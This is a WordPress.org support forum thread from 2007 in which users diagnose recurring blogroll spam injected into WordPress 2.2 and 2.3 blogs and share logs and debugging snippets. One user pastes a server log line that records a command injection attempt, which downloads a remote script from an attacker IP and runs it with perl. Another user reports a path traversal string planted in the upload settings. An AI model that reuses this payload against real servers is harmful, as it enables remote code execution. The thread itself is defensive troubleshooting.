WordPress.org

Support

Support » How-To and Troubleshooting » blogroll spam on WordPress 2.3

blogroll spam on WordPress 2.3

  • I am fighting a new form of spam on my blog. Just when I think I’ve got things pretty tightly locked the spammers find a new way. I’m getting spam in my blogroll.

    See for yourself (http://erik.weibust.net). I promise I’m not trying to sell male enhancement drugs from my site. It’s taken me 12 hours to be able to joke about this, as I was quite pissed when I saw the intrusion.

    Anyhow, I’d love some help on resolving the issue and was thinking this would be a good place to start looking.

    Some background on the problem. I was running WP 2.1 until last night. The first thing that clued me into the problem was I got an email about a new user on my blog on Friday. That freaked me out as I’m the only user, and I didn’t add a new user. So I login to the dashboard and immediately removed the user. I spent some time digging around my dashboard and didn’t see anything “fishy” so I thought I might be ok.

    Then on Saturday I noticed there was a whole bunch of spam links added to my blogroll. I immediately logged in to the dashboard and removed the links. Then I checked the users tab, expecting to see a new user, there wasn’t one. I’m at a loss as to how the links got added without a login to my blog. To be safe I changed my WP admin password.

    Sunday the spam was back. I didn’t know what else to do, so I upgraded to WP 2.3 hoping that would help. No dice. Now I have a very generic blog, with a crapload of blogroll spam.

    Please help. I’m guessing the next step is to change the passwords for my db user and my ssh user. I can’t change the password right now, I’m at work and can’t get through my work proxy to the servers. I’m making the password change as soon as I get home.

    I’ve checked the sidebar and it looks clean. I program, but not in php, so I’m not 100% sure the sidebar is good. That said, I’m fine with deleting my sidebar and downloading/installing a new one, as I’m now running a completely stripped down template.

    What else should I do/check?

    Thanks…

Viewing 15 replies - 16 through 30 (of 43 total)
  • I hate to do this…. but the fix did not work. I woke up this morning and had 10 more spam blogroll links. 🙁

    I guess that I should just go ahead and rename links.php and wait for another fix.

    One question, if I rename links.php what do I lose? Will I still have a blogroll, but won’t be able to update it? Or, will the blogroll completely disappear from my sidebar?

    Thanks…

    a) It’s “link.php” (in the wp-admin folder), not “links.php”. Don’t rename the wrong thing.

    b) You’ll lose the ability to edit or add to the blogroll in any way.

    Also, the fix should have worked. I suspect that you did not apply the fix correctly… considering that you keep referring to the wrong file name.

    Thanks Otto42,

    I hope you’re right on me incorrectly applying the fix. I’ll check when I get off work.

    I downloaded a zip file. Unzipped it. Scp’ed the file to my server. Renamed the existing file to link(s).php (not sure, are there two, both link and links?). Lastly, I copied the newly uploaded file to wp-admin dir.

    Erik

    Otto42,

    I believe I’ve done everything correctly with the fix. Here is what I’ve done.

    -rw-r–r– 1 erikweibust pg928284 2506 Oct 16 18:27 link.php
    -rw-r–r– 1 erikweibust pg928284 2824 Jun 1 19:53 link.php.bak

    I’m not sure what the best way is to show you what I’ve done other then by showing you the above ls -l.

    What do I need to do now?

    Erik

    One more update. I have renamed the link.php file so hopefully this stops the attacks while the WordPress people can investigate.

    Erik

    I don’t know, that fix should work. I’ll investigate it myself this evening.

    Renaming link.php will work, but again, disables your ability to manage the blogroll. Still, it will stop the bleeding for now.

    Otto42, Thanks a MILLION for all the help. Is there anything else I can provide that would be of any help? If so, please let me know.

    Erik

    I’m having the exact same problem. I updated from 2.1 to 2.3 three days ago because of blogroll spam but I keep getting spam links.

    Yesterday I found this post and I updated the “link.php” file correctly, but today another 41 spam links showed up in my blogroll.

    For now I’ll change my theme so it display the links with static HTML, instead of getting the links from the database.

    I just deleted 300 links from my blogroll. It’s the same problem and the background is much the same–we were using 2.2x and found spam on the blogroll. I deleted it, checked all the permissions on folders and then upgraded to 2.3. They keep coming back.

    Our (custom) theme doesn’t have a blogroll, so the links don’t appear anywhere on the site. I’ve noticed a lot of incoming links from spam sites, too, so maybe this is a way to game search engines.

    No new admin users have appeared. We do have about 15,000 registered users, however.

    http://www.commondreams.org is our home page–but that’s done with html. The stories, however, are all published with WordPress.

    Hi willyrs,
    Since installing WP 2.3, Have you modified the link.php file in the wp-admin folder? (Ie. Removed it and uploaded this one in its place: http://svn.automattic.com/wordpress/branches/2.3/wp-admin/link.php ?)

    If you have, and its continueing, Could you drop me a line at wordpress@dd32.id.au

    Hi eweibust/viniciusweb,
    I notice you have user registration disabled on your blogs, Has it allways been like that? Or only just changed to prevent the spam?
    In order to complete the attack at present, the user needs to have an account(Doesnt matter what role) AFAIK,
    Do you have access to your server logs? Can you check to see if there have been any admin entries for about the time the spam is being added?
    If you want some more help in tracing it, you can email me at the above address,

    dd32, thank you for your help.

    My blog never had other users. I checked now and the only user is “admin”. The password was changed last week, but I don’t know if there was more spam after the change (will be watching it now).

    I looked up the server logs and found a lot of entries for IP “195.5.116.246”, making POST requests to the “link-add.php” file. This IP is cited by auxesis in http://trac.wordpress.org/ticket/4627

    Besides that, I found some requests like this:

    201.37.71.117 - - [19/Oct/2007:14:36:23 -0700] "GET /blog//wp-pass.php?_wp_http_referer=http://www.chamala.kit.net/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 503 620 "-" "Mozilla/3.0 (compatible; Indy Library)"

    The “http://www.chamala.kit.net/tool25.txt” points to a PHP script and “http://201.37.71.1175:8090/x.txt” points to a Perl script. I hadn’t check the code yet.

    Let me know if you need any other information.

    The wp-pass.php GET is a link laundering attempt that we now block.

    I’m not sure how posting to link-add.php would allow this, but I’m digging into it.

    > I’m not sure how posting to link-add.php would allow this, but I’m digging into it.
    Neither am i, I get blocked by user_can_access_admin_page(), but i cant find any modifying code anywhere in there.

    hi viniciusweb,

    Could you add some debugging code to the affected pages?(i’m thinking link.php and link-add.php)
    Maybe something like this:

    if ( 'POST' == $_SERVER['REQUEST_TYPE'] ) {
        error_log(print_r($_POST, true));
        global $current_user;
        error_log(print_r($current_user, true));
    }

    You could probably use the mail command too:

    if ( 'POST' == $_SERVER['REQUEST_TYPE'] ) {
        global $current_user;
        wp_mail('me@myaddress.com', 'WP debug', print_r($_POST, true));
        wp_mail('me@myaddress.com', 'WP debug', print_r($current_user, true));
    }

    (If you do that, can you forward the stuff onto me?)

    That goes for anyone who is getting this spam, if you want to help, send some raw information over so we can determine how its getting past.

    From a review of the old code and the patch proposed for 2.3.1 I can’t see how the links are getting add by the POST requests on link.php unless the requests are being made by a user with the extra capability check for manage_links at the top of link.php as this is already checked later in the code path before the link is added in edit_link (called by add_link for link additions).

    It looks like therefore the POST request must be coming in with valid cookies for a high level user.

    Can those who have been affected by this issue confirm:

    1. What version of WordPress you were running?
    2. What plugins you have installed
    3. If user registration was enabled
    4. If you found extra users had been added at the time this issue occured

    Cheers westi

    Hi everyone, I’ve had the same problem with my blogroll being spammed (just renamed the problem file[s] for now).
    I just noticed that my “upload directory” in Admin > Options > Miscellaneous (that is in wp-admin/options-misc.php) was also changed to this string:
    “/../../../../../../../../../../../../../../../../../tmp”.

    To respond to westi:
    1.WP 2.2 for the moment.
    2.lots of plugins (too lazy to post them all, sorry)
    3.user registration is not enabled
    4.no new users found at the time I found the problem

Viewing 15 replies - 16 through 30 (of 43 total)
  • The topic ‘blogroll spam on WordPress 2.3’ is closed to new replies.
Skip to toolbar